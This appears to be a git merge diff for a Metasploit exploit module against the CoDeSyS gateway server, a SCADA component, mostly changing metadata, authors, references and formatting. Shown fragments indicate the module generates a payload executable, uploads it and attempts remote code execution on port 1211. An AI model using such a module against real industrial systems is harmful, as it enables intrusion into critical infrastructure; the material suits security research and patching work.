Merge branch 'codesys_gateway_server_remote_execution.rb' of github.com:nahualito/metasploit-framework into nahualito-codesys_gateway_server_remote_execution.rb
commit
7219c7b4aa
|
@ -1,5 +1,9 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com
|
||||
##
|
||||
require 'msf/core'
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
|
@ -18,27 +22,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Aaron Portnoy <aaron@exodusintel.com>',
|
||||
'Enrique Sanchez <esanchez@accuvant.com>'
|
||||
],
|
||||
'License' => 'MSF_LICENSE',
|
||||
'References' =>
|
||||
[
|
||||
['Exodus Intel Training', '02-2013']
|
||||
['ICSA-13-050-01', '02-19-2013']
|
||||
],
|
||||
'DisclosureDate' => 'Feb 02 2013',
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows Universal', { }]
|
||||
['Windows Universal S3 CoDeSyS < 2.3.9.27', { }]
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1211),
|
||||
], self.class
|
||||
)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -77,14 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("File uploaded")
|
||||
end
|
||||
|
||||
def remove_file
|
||||
end
|
||||
|
||||
def read_file
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("- Attempting to communicate with SCADA system #{rhost} on port #{rport}")
|
||||
print_status("Attempting to communicate with SCADA system #{rhost} on port #{rport}")
|
||||
|
||||
# We create an exe payload, we have to get remote execution in 2 steps
|
||||
exe = generate_payload_exe
|
||||
|
|
Loading…
Reference in New Issue